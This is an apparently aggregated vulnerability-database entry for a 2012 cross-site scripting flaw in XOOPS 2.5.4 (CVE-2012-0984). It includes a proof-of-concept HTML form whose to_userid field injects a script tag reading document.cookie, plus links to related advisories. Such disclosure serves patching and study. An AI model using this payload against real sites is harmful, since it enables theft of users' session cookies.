Lucene search
High-Tech Bridge SAEDB-ID:37092HistoryApr 18, 2012 - 12:00 a.m.
XOOPS 2.5.4 - '/modules/pm/pmlite.php?to_userid' Cross-Site Scripting
2012-04-1800:00:00
High-Tech Bridge SA
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/53143/info
XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
XOOPS 2.5.4 is vulnerable; other versions may be affected.
<form action='http://www.example.com/modules/pm/pmlite.php' method="post">
<input type="hidden" name="sendmod" value='1'>
<input type="hidden" name="to_userid" value='"><script>alert(document.cookie);</script>'>
<input type="submit" value="submit" id="btn">
</form>Related
exploitpack
exploitpack
XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities
2012-04-19 00:00:00
nvd
nvd
CVE-2012-0984
2014-09-11 14:16:03
exploitdb
exploitdb
seebug
seebug
XOOPS 2.5.4 Multiple XSS Vulnerabilities
2012-04-20 00:00:00
cve
cve
CVE-2012-0984
2014-09-11 14:16:03
securityvulns
securityvulns
Multiple XSS vulnerabilities in XOOPS
2012-04-23 00:00:00
zdt
zdt
XOOPS 2.5.4 Cross Site Scripting
2012-04-18 00:00:00
packetstorm
packetstorm
XOOPS 2.5.4 Cross Site Scripting
2012-04-18 00:00:00
prion
prion
Cross site scripting
2014-09-11 14:16:00
cvelist
cvelist
CVE-2012-0984
2014-09-11 14:00:00
htbridge
htbridge
Multiple XSS vulnerabilities in XOOPS
2011-12-07 00:00:00